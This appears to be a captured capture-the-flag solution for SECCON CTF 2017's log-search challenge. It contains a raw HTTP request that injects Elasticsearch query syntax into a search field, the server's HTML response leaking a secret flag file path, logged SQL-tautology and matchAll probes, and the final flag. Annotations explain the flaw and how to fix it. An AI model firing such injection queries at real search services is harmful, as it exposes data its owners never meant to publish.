SECCON CTF 2017 - Elasticsearch
POST /logsearch.php HTTP/1.1 | |
Host: localhost | |
Content-Length: 67 | |
Cache-Control: max-age=0 | |
Origin: http://logsearch.pwn.seccon.jp | |
Upgrade-Insecure-Requests: 1 | |
Content-Type: application/x-www-form-urlencoded | |
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36 | |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 | |
Referer: http://logsearch.pwn.seccon.jp/logsearch.php?aaalongcat | |
Accept-Encoding: gzip, deflate | |
Accept-Language: en-US,en;q=0.9 | |
Connection: close | |
query=verb:GET+AND+flag+AND+response:200+AND+!request:logsearch.php | |
HTTP/1.1 200 OK | |
Date: Sat, 09 Dec 2017 18:56:22 GMT | |
Server: Apache | |
X-Powered-By: PHP/5.4.16 | |
Content-Length: 4535 | |
Connection: close | |
Content-Type: text/html; charset=UTF-8 | |
<!DOCTYPE html> | |
<html> | |
<head> | |
<meta charset="UTF-8"> | |
<meta content="width=device-width, initial-scale=1" name="viewport"> | |
<title>Log search</title> | |
</head> | |
<body> | |
<!-- Reviewer annotation (not part of the captured response): this body is
     the server's answer to the POST shown above it. The submitted query
     string uses field prefixes (verb:, response:, request:), AND, and a
     leading ! negation, and every row returned below is consistent with
     those operators having been applied by the search backend. The
     server-side code is not shown, so how the query is built is inferred. -->
<h1>Log search</h1> | |
<h2>Search</h2> | |
<!-- The submitted query is echoed into the value attribute below. The
     placeholder "Request.Path" suggests the box was meant for a plain
     path search only (assumption; confirm against the application). -->
<form method="POST"> | |
<table><tr> | |
<td><input type="text" name="query" value="verb:GET AND flag AND response:200 AND !request:logsearch.php" placeholder="Request.Path"></td> | |
<td><input type="submit"></td> | |
</tr></table> | |
</form> | |
<h2>Result</h2> | |
<!-- Each row is one access-log entry. The flag-*.txt rows with response 200
     are successful fetches of that file recorded in the log, so the
     searchable log itself discloses a file name that was presumably meant to
     be unguessable. Defensive takeaway: pass user text to the search
     backend as the value of one fixed field (for example an Elasticsearch
     match query) rather than as raw query_string syntax, limit which
     fields and documents a public search can reach, and do not rely on a
     secret path when requests for it are indexed and searchable. -->
<table border="1"> | |
<tr> | |
<th>timestamp</th> | |
<th>verb</th> | |
<th>request</th> | |
<th>response</th> | |
</tr> | |
<tr> | |
<td>10/Dec/2017:03:55:45 +0900</td> | |
<td>GET</td> | |
<td>//flag-b5SFKDJicSJdf6R5Dvaf2Tx5r4jWzJTX.txt</td> | |
<td>200</td> | |
</tr> | |
<tr> | |
<td>10/Dec/2017:02:43:53 +0900</td> | |
<td>GET</td> | |
<td>//flag-b5SFKDJicSJdf6R5Dvaf2Tx5r4jWzJTX.txt</td> | |
<td>200</td> | |
</tr> | |
<tr> | |
<td>10/Dec/2017:02:43:00 +0900</td> | |
<td>GET</td> | |
<td>//flag-b5SFKDJicSJdf6R5Dvaf2Tx5r4jWzJTX.txt</td> | |
<td>200</td> | |
</tr> | |
<tr> | |
<td>10/Dec/2017:02:36:05 +0900</td> | |
<td>GET</td> | |
<td>/flag-b5SFKDJicSJdf6R5Dvaf2Tx5r4jWzJTX.txt</td> | |
<td>200</td> | |
</tr> | |
<tr> | |
<td>10/Dec/2017:02:34:08 +0900</td> | |
<td>GET</td> | |
<td>/flag-b5SFKDJicSJdf6R5Dvaf2Tx5r4jWzJTX.txt</td> | |
<td>200</td> | |
</tr> | |
<tr> | |
<td>10/Dec/2017:02:33:49 +0900</td> | |
<td>GET</td> | |
<td>/flag-b5SFKDJicSJdf6R5Dvaf2Tx5r4jWzJTX.txt</td> | |
<td>200</td> | |
</tr> | |
<tr> | |
<td>10/Dec/2017:02:32:51 +0900</td> | |
<td>GET</td> | |
<td>/flag-b5SFKDJicSJdf6R5Dvaf2Tx5r4jWzJTX.txt</td> | |
<td>200</td> | |
</tr> | |
<tr> | |
<td>10/Dec/2017:02:32:43 +0900</td> | |
<td>GET</td> | |
<td>/flag-b5SFKDJicSJdf6R5Dvaf2Tx5r4jWzJTX.txt</td> | |
<td>200</td> | |
</tr> | |
<tr> | |
<td>10/Dec/2017:02:32:18 +0900</td> | |
<td>GET</td> | |
<td>/flag-b5SFKDJicSJdf6R5Dvaf2Tx5r4jWzJTX.txt</td> | |
<td>200</td> | |
</tr> | |
<tr> | |
<td>10/Dec/2017:02:31:39 +0900</td> | |
<td>GET</td> | |
<td>//flag-b5SFKDJicSJdf6R5Dvaf2Tx5r4jWzJTX.txt</td> | |
<td>200</td> | |
</tr> | |
<tr> | |
<td>10/Dec/2017:02:31:15 +0900</td> | |
<td>GET</td> | |
<td>/flag-b5SFKDJicSJdf6R5Dvaf2Tx5r4jWzJTX.txt</td> | |
<td>200</td> | |
</tr> | |
<tr> | |
<td>10/Dec/2017:02:30:57 +0900</td> | |
<td>GET</td> | |
<td>/flag-b5SFKDJicSJdf6R5Dvaf2Tx5r4jWzJTX.txt</td> | |
<td>200</td> | |
</tr> | |
<tr> | |
<td>10/Dec/2017:02:24:43 +0900</td> | |
<td>GET</td> | |
<td>//flag-b5SFKDJicSJdf6R5Dvaf2Tx5r4jWzJTX.txt</td> | |
<td>200</td> | |
</tr> | |
<tr> | |
<td>10/Dec/2017:02:23:25 +0900</td> | |
<td>GET</td> | |
<td>/flag-b5SFKDJicSJdf6R5Dvaf2Tx5r4jWzJTX.txt</td> | |
<td>200</td> | |
</tr> | |
<tr> | |
<td>10/Dec/2017:02:23:20 +0900</td> | |
<td>GET</td> | |
<td>/flag-b5SFKDJicSJdf6R5Dvaf2Tx5r4jWzJTX.txt</td> | |
<td>200</td> | |
</tr> | |
<tr> | |
<td>10/Dec/2017:02:22:47 +0900</td> | |
<td>GET</td> | |
<td>//flag-b5SFKDJicSJdf6R5Dvaf2Tx5r4jWzJTX.txt</td> | |
<td>200</td> | |
</tr> | |
<!-- The next rows are earlier probes kept in the same log: a SQL-style
     tautology and, further down, a JSON-like matchAll attempt, both sent
     as GET parameters to "/". They appear here because they contain the
     term "flag" and were answered with 200; the same log that leaked the
     path is also where such probing can be detected. -->
<tr> | |
<td>10/Dec/2017:02:11:29 +0900</td> | |
<td>GET</td> | |
<td>/?query=flag+OR+1%3D1+--+</td> | |
<td>200</td> | |
</tr> | |
<tr> | |
<td>10/Dec/2017:02:10:34 +0900</td> | |
<td>GET</td> | |
<td>/?query=flag+OR+1%3D1+--+</td> | |
<td>200</td> | |
</tr> | |
<tr> | |
<td>10/Dec/2017:02:08:12 +0900</td> | |
<td>GET</td> | |
<td>/flag-b5SFKDJicSJdf6R5Dvaf2Tx5r4jWzJTX.txt</td> | |
<td>200</td> | |
</tr> | |
<tr> | |
<td>10/Dec/2017:01:47:22 +0900</td> | |
<td>GET</td> | |
<td>/?query={matchAll={flag}}?pretty=true</td> | |
<td>200</td> | |
</tr> | |
<tr> | |
<td>10/Dec/2017:01:46:59 +0900</td> | |
<td>GET</td> | |
<td>/?query={matchAll={flag}}?pretty=true</td> | |
<td>200</td> | |
</tr> | |
<tr> | |
<td>10/Dec/2017:01:45:00 +0900</td> | |
<td>GET</td> | |
<td>/flag-b5SFKDJicSJdf6R5Dvaf2Tx5r4jWzJTX.txt</td> | |
<td>200</td> | |
</tr> | |
<tr> | |
<td>10/Dec/2017:01:44:45 +0900</td> | |
<td>GET</td> | |
<td>/flag-b5SFKDJicSJdf6R5Dvaf2Tx5r4jWzJTX.txt</td> | |
<td>200</td> | |
</tr> | |
<tr> | |
<td>10/Dec/2017:01:43:37 +0900</td> | |
<td>GET</td> | |
<td>/flag-b5SFKDJicSJdf6R5Dvaf2Tx5r4jWzJTX.txt</td> | |
<td>200</td> | |
</tr> | |
<tr> | |
<td>10/Dec/2017:01:42:37 +0900</td> | |
<td>GET</td> | |
<td>/flag-b5SFKDJicSJdf6R5Dvaf2Tx5r4jWzJTX.txt</td> | |
<td>200</td> | |
</tr> | |
<tr> | |
<td>10/Dec/2017:01:42:01 +0900</td> | |
<td>GET</td> | |
<td>//flag-b5SFKDJicSJdf6R5Dvaf2Tx5r4jWzJTX.txt</td> | |
<td>200</td> | |
</tr> | |
<tr> | |
<td>10/Dec/2017:01:37:16 +0900</td> | |
<td>GET</td> | |
<td>//flag-b5SFKDJicSJdf6R5Dvaf2Tx5r4jWzJTX.txt</td> | |
<td>200</td> | |
</tr> | |
<tr> | |
<td>10/Dec/2017:01:37:00 +0900</td> | |
<td>GET</td> | |
<td>/flag-b5SFKDJicSJdf6R5Dvaf2Tx5r4jWzJTX.txt</td> | |
<td>200</td> | |
</tr> | |
<tr> | |
<td>10/Dec/2017:01:36:35 +0900</td> | |
<td>GET</td> | |
<td>/flag-b5SFKDJicSJdf6R5Dvaf2Tx5r4jWzJTX.txt</td> | |
<td>200</td> | |
</tr> | |
<tr> | |
<td>10/Dec/2017:01:36:13 +0900</td> | |
<td>GET</td> | |
<td>/flag-b5SFKDJicSJdf6R5Dvaf2Tx5r4jWzJTX.txt</td> | |
<td>200</td> | |
</tr> | |
</table> | |
</body> | |
</html> | |
http://logsearch.pwn.seccon.jp/flag-b5SFKDJicSJdf6R5Dvaf2Tx5r4jWzJTX.txt | |
SECCON{N0SQL_1njection_for_Elasticsearch!} |